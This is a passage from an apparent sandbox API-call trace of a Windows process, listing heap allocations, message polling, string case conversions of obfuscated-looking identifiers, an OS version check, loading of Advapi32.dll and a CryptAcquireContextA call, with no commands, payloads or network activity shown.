hHeap=0x2af0000) returned 1 [0157.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0157.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0157.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0157.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0157.583] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0157.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0157.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0157.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0157.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0157.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0157.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0157.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0157.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0157.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0157.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0157.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0157.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0157.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0157.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0157.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0157.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0157.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0157.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0157.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0157.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0157.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0157.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0157.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0157.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0157.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0157.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0157.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0157.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0157.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0157.584] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0157.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0157.584] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0157.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0157.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0157.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa08 [0157.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0157.584] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0157.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0157.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0157.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0157.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0157.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0157.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0157.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0157.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0157.584] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0157.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0157.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0157.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0157.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0157.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0157.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0157.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0157.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0157.585] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0157.585] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0157.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0157.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0157.585] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0157.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0157.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0157.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa990 [0157.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0157.585] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0157.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0157.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0157.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0157.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0157.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0157.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0157.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0157.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0157.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0157.585] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0157.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0157.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0157.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0157.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0157.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0157.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0157.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0157.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0157.586] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0157.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0157.586] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0157.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0157.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0157.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0157.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0157.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0157.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0157.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0157.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0157.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0157.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0157.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0157.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0157.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0157.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0157.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0157.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0157.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0157.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0157.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0157.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0157.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0157.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0157.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0157.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0157.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0157.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0157.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0157.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0157.587] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0157.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0157.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0157.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0157.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0157.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0157.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0157.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0157.587] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0157.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0157.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0157.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0157.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0157.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0157.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0157.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0157.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0157.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0157.588] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0157.588] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.588] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0157.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0157.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0157.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0157.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0157.588] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0157.588] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0157.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0157.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0157.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0157.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0157.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0157.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0157.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0157.588] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0157.588] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0157.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0157.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0157.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0157.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0157.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0157.588] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0157.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0157.589] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.589] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.589] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.589] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0157.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0157.589] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.589] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0157.589] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0157.589] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0157.589] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0157.589] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0157.589] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0157.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0157.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7060, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0157.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0157.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6fc0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0157.590] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9be890) returned 1 [0157.590] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.590] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.590] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0157.590] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.590] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0157.591] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.591] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.591] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.591] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.591] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.591] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.591] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0157.591] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.591] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0157.591] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.591] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.591] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0157.591] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd 